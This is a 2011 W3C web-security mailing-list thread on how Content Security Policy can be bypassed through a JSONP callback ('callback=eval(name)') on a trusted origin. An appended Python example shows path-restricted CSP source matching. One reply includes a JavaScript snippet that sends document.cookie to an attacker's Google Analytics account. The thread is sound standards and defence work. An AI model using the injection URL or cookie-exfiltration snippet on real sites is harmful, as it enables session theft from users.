- From: <sird@rckc.at>
- Date: Mon, 30 May 2011 13:36:07 -0500
- To: Adam Barth <w3c@adambarth.com>
- Cc: public-web-security@w3.org, masatokinugawa@gmail.com
It's an example :P but ok, let's say the attacker uses:

var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-evil-1']);
_gaq.push(['_trackPageview']);
_gaq.push(['_trackEvent', 'cookies', 'add', document.cookie]);

And uses google analytics to send data back to the attacker.

Or let's say the attacker iframes youtube.com and loads a payload inside a gadget in youtube.

Or let's say the attacker does the attack directly with XHR.

-- Eduardo

On Mon, May 30, 2011 at 1:00 PM, Adam Barth <w3c@adambarth.com> wrote:
> On Mon, May 30, 2011 at 10:37 AM, Eduardo Vela <sirdarckcat@gmail.com> wrote:
>> Hi List.
>>
>> I think this issue has come up before (can't find the thread but I've
>> seen it) and Masato (cc'd) brought this up to us recently.
>>
>> What can a CSP user do in the following case:
>>
>> 1. www.mozilla.org trusts scripts from www.youtube.com because they
>> use one of their scripts.
>> 2. Attacker is able to do
>> www.youtube.com/video/export?id=1337&callback=eval(name)
>
> Won't that be blocked because eval is blocked?
>
> Adam
>
>
>> 3. Then Mozilla isn't capable of protecting using CSP.
>>
>> In general, Mozilla can't realistically know all the things we put in
>> www.youtube.com. If Youtube doesn't care about CSP, there's no reason
>> for them to fix it. And Mozilla might not be able to mirror the script
>> to their own servers because it might change at any moment, and their
>> site might break.
>>
>> Could it be possible to whitelist specific files, instead of complete
>> origins? Maybe even global expressions (e.g.
>> www.youtube.com/scripts/*.js)?
>> Or.. maybe Mozilla shouldn't trust Youtube at all?
>> What about.. Content-Type enforcement? Force scripts allowed on a CSP
>> document to have the right Content-Type.
>>
>> How does this apply for the use case of stats services, captcha, ads,
>> etc.. which all require external scripts?
>>
>> I think forcing the right Content-Type for scripts might be the best
>> solution, and maybe a rule to override this behavior, comments?
>>
>> Thanks!!
>>
>> -- Eduardo
Received on Monday, 30 May 2011 18:36:54 UTC
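The question raised in the thread, whether a CSP source list can name a path rather than a whole origin, was later addressed by CSP Level 2 path matching (a source path ending in "/" is a prefix match, any other path is an exact match, and the query string is ignored). The following is an added example, not code from the thread or from any CSP implementation: a simplified matcher for that rule, run against URLs modelled on the thread's scenario. It assumes the document and the scripts share a scheme, ignores ports and "*." host wildcards, and does not support glob patterns such as "*.js".

```python
from urllib.parse import urlsplit


def _path_matches(expr_path: str, url_path: str) -> bool:
    """CSP Level 2 path rule: an empty source path matches any path, a
    source path ending in '/' is a prefix match, anything else is exact.
    The URL's query string and fragment never take part in the match."""
    if expr_path == "":
        return True
    if expr_path.endswith("/"):
        return url_path.startswith(expr_path)
    return url_path == expr_path


def source_allows(expr: str, url: str) -> bool:
    """True if one host-source expression without a scheme, e.g.
    'www.youtube.com' or 'www.youtube.com/scripts/', permits `url`.
    Simplification: scheme, port and '*.' host wildcards are ignored."""
    host, sep, rest = expr.partition("/")
    expr_path = "/" + rest if sep else ""
    parts = urlsplit(url)
    return parts.hostname == host.lower() and _path_matches(expr_path, parts.path)


def script_allowed(script_src: str, url: str) -> bool:
    """Evaluate a script-src value (space-separated source list) for `url`;
    keyword sources such as 'self' are skipped in this simplified model."""
    sources = [e for e in script_src.split() if not e.startswith("'")]
    return any(source_allows(e, url) for e in sources)


# Constructed URLs modelled on the thread: the JSONP endpoint on the trusted
# origin with a caller-controlled callback, and a legitimate script under
# /scripts/ that the embedding site actually needs.
JSONP = "https://www.youtube.com/video/export?id=1337&callback=eval(name)"
PLAYER = "https://www.youtube.com/scripts/player.js"

ORIGIN_POLICY = "'self' www.youtube.com"          # whole origin trusted
PATH_POLICY = "'self' www.youtube.com/scripts/"   # only the script directory

if __name__ == "__main__":
    for label, policy in (("origin", ORIGIN_POLICY), ("path", PATH_POLICY)):
        print(label, "jsonp:", script_allowed(policy, JSONP),
              "player:", script_allowed(policy, PLAYER))
```

With the origin-wide policy both URLs load; with the path-restricted policy the JSONP endpoint is refused while the real script still loads, which is the narrowing the thread asks for.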